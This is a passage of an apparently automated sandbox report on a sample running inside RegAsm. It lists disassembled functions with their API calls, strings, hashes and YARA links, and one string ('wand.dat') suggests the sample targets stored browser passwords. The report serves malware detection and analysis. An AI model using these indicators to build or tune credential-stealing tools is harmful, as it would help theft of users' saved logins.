                                          Download Yara Rule
                                          APIs
                                          • wcscpy.MSVCRT ref: 0044475F
                                          • wcscat.MSVCRT ref: 0044476E
                                          • wcscat.MSVCRT ref: 0044477F
                                          • wcscat.MSVCRT ref: 0044478E
                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                            • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                            • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                          • String ID: \StringFileInfo\
                                          • API String ID: 102104167-2245444037
                                          • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                          • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                          • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                          • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                          Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                          Download Yara Rule
                                          APIs
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                          • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                          • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                          • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                          Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 004100FB
                                          • memset.MSVCRT ref: 00410112
                                            • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                            • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                          • _snwprintf.MSVCRT ref: 00410141
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memset$_snwprintf_wcslwrwcscpy
                                          • String ID: </%s>
                                          • API String ID: 3400436232-259020660
                                          • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                          • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                          • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                          • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                          Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 0040D58D
                                          • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                          • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ChildEnumTextWindowWindowsmemset
                                          • String ID: caption
                                          • API String ID: 1523050162-4135340389
                                          • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                          • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                          • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                          • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                          Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                            • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                          • CreateFontIndirectW.GDI32(?), ref: 00401156
                                          • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                          • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                          • String ID: MS Sans Serif
                                          • API String ID: 210187428-168460110
                                          • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                          • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                          • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                          • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                          Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                          Download Yara Rule
                                          APIs
                                          • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                          • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                          • memcmp.MSVCRT ref: 0041D8CB
                                          • memcmp.MSVCRT ref: 0041D913
                                          • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memcpy$memcmp
                                          • String ID:
                                          • API String ID: 3384217055-0
                                          • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                          • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                          • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                          • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                          Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memset$memcpy
                                          • String ID:
                                          • API String ID: 368790112-0
                                          • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                          • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                          • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                          • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                          Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 0040560C
                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                            • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                            • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                          • String ID: *.*$dat$wand.dat
                                          • API String ID: 2618321458-1828844352
                                          • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                          • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                          • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                          • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                          Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 00412057
                                            • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                          • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                          • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                          • GetKeyState.USER32(00000010), ref: 0041210D
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                          • String ID:
                                          • API String ID: 3550944819-0
                                          • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                          • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                          • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                          • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                          Function 0040F508 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                          Download Yara Rule
                                          APIs
                                          • free.MSVCRT ref: 0040F561
                                          • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                          • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memcpy$free
                                          • String ID: g4@
                                          • API String ID: 2888793982-2133833424
                                          • Opcode ID: 736b2a0850d57b1886aaef609728f86ad4ae4702e86aed8cee47d08aa5f40c62
                                          • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                          • Opcode Fuzzy Hash: 736b2a0850d57b1886aaef609728f86ad4ae4702e86aed8cee47d08aa5f40c62
                                          • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                          Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                          Download Yara Rule
                                          APIs
                                          • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                          • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                          • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memcpy
                                          • String ID: @
                                          • API String ID: 3510742995-2766056989
                                          • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                          • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                          • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                          • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                          Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 004144E7
                                            • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                            • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                          • memset.MSVCRT ref: 0041451A
                                          • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                          • String ID:
                                          • API String ID: 1127616056-0
                                          • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                          • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                          • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                          • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                          Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                          Download Yara Rule
                                          APIs
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                          • malloc.MSVCRT ref: 00417459
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,756F18FE,?,0041755F,?), ref: 00417478
                                          • free.MSVCRT ref: 0041747F
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$freemalloc
                                          • String ID:
                                          • API String ID: 2605342592-0
                                          • Opcode ID: 53c249c4ed26904e3077c8c6e0d5a5fb1c5dae0b3f1e23511c3111531268d4c8
                                          • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                          • Opcode Fuzzy Hash: 53c249c4ed26904e3077c8c6e0d5a5fb1c5dae0b3f1e23511c3111531268d4c8
                                          • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                          Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                          • RegisterClassW.USER32(?), ref: 00412428
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                          • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: HandleModule$ClassCreateRegisterWindow
                                          • String ID:
                                          • API String ID: 2678498856-0
                                          • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                          • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                          • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                          • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                          Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 0040F673
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                          • strlen.MSVCRT ref: 0040F6A2
                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                          • String ID:
                                          • API String ID: 2754987064-0
                                          • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                          • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                          • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                          • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                          Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 0040F6E2
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                          • strlen.MSVCRT ref: 0040F70D
                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                          • String ID:
                                          • API String ID: 2754987064-0
                                          • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                          • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                          • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                          • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                          Function 00414770 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 40COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: wcscpy$CloseHandle
                                          • String ID: General
                                          • API String ID: 3722638380-26480598
                                          • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                          • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                          • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                          • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                          Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                            • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                            • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                          • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                          • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                          • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                          • GetStockObject.GDI32(00000000), ref: 004143C6
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                          • String ID:
                                          • API String ID: 764393265-0
                                          • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                          • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                          • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                          • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                          Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                          • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                          • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Time$System$File$LocalSpecific
                                          • String ID:
                                          • API String ID: 979780441-0
                                          • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                          • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                          • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                          • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                          Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                          Download Yara Rule
                                          APIs
                                          • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                          • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                          • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memcpy$DialogHandleModuleParam
                                          • String ID:
                                          • API String ID: 1386444988-0
                                          • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                          • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                          • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                          • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                          Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                          Download Yara Rule
                                          APIs
                                          • wcschr.MSVCRT ref: 0040F79E
                                          • wcschr.MSVCRT ref: 0040F7AC
                                            • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                            • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: wcschr$memcpywcslen
                                          • String ID: "
                                          • API String ID: 1983396471-123907689
                                          • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                          • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                          • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                          • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                          Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                          Download Yara Rule
                                          APIs
                                          • _snwprintf.MSVCRT ref: 0040A398
                                          • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: _snwprintfmemcpy
                                          • String ID: %2.2X
                                          • API String ID: 2789212964-323797159
                                          • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                          • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                          • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
